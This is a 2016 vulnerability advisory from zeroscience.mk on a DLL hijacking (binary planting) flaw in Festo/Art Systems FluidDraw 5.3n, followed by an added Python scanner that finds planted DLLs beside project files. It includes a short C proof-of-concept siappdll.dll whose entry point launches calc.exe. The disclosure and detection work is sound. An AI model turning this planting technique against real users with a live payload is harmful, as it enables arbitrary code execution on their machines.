Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution
Source: zeroscience.mk  Author: LiquidWorm  Published: 2016-01-20
/*


Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution


Vendor: Art Systems Software GmbH | Festo AG & Co. KG
Product web page: http://www.art-systems.com | https://www.festo.com
Affected version: FluidDraw S5 Starter 5.3n (5.3.385.0)
                  FluidDraw P5 Professional 5.3n (5.3.385.0)

Summary: FluidDraw enables the creation of electrical and pneumatic
circuit diagrams. The tool makes it easier to plan complete systems
and implement individual components. Users access the Festo catalogue
and their own imported databases and can thus benefit from evaluation
functions and created assembly drawings. The software is part of Festo
Engineering Tools, which provides users with electronic and continuous
support in the entire process, from planning, selection, design and
ordering up to delivery and commissioning.

Desc: FluidDraw suffers from a DLL hijacking issue. The vulnerability
is caused by the application loading libraries (siappdll.dll) in
an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.PRJ, .CIRC,
.CT, .DXF, .SYM) located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5295
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5295.php


01.12.2015

*/


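// Build: gcc -shared -o siappdll.dll exploit.c

#include <windows.h>

// Forward declaration so DllMain can call exec() without an implicit declaration.
int exec(void);

// Entry point the loader calls once FluidDraw resolves siappdll.dll to this file.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

// Proof-of-concept payload: start the Windows calculator.
int exec(void)
{
	WinExec("calc.exe", SW_NORMAL);
	return 0;
}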
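
A defender-side check for the condition the advisory describes, added here as an example that is not part of the original advisory: it walks a share or project tree and reports DLLs stored in the same directory as FluidDraw documents. The DLL name and file extensions come from the advisory; the function names, severity labels and sample tree are assumptions constructed for illustration.

```python
import os
import tempfile
from pathlib import Path

# Values taken from the advisory text: the hijackable DLL and the document types.
HIJACK_DLL = "siappdll.dll"
DOC_EXTS = {".prj", ".circ", ".ct", ".dxf", ".sym"}


def find_planted_dlls(root):
    """Return sorted (relative_path, severity) pairs for DLLs that share a
    directory with FluidDraw documents under root (hypothetical helper)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # Windows file names are case-insensitive, so compare in lower case.
        has_docs = any(Path(f.lower()).suffix in DOC_EXTS for f in files)
        if not has_docs:
            continue  # the advisory's scenario needs a document in the same directory
        for name in files:
            if not name.lower().endswith(".dll"):
                continue
            severity = "high" if name.lower() == HIJACK_DLL else "review"
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            findings.append((rel.replace(os.sep, "/"), severity))
    return sorted(findings)


def build_sample_tree(root):
    """Create a constructed directory layout for the demonstration."""
    layout = {
        "projects/line1": ["press.circ", "SiAppDll.DLL"],  # advisory DLL name, mixed case
        "projects/line2": ["valve.PRJ", "helper.dll"],     # other DLL beside a document
        "projects/line3": ["clean.dxf", "notes.txt"],      # documents only
        "tools/bin": ["siappdll.dll"],                     # no documents in this directory
    }
    for rel_dir, names in layout.items():
        target = Path(root, rel_dir)
        target.mkdir(parents=True)
        for name in names:
            (target / name).write_bytes(b"")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for path, severity in find_planted_dlls(build_sample_tree(tmp)):
            print(f"{severity:6} {path}")
```

A "high" result is a file named siappdll.dll beside a document; "review" marks any other DLL in a document directory, which is unusual on a share that should hold only project files.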

 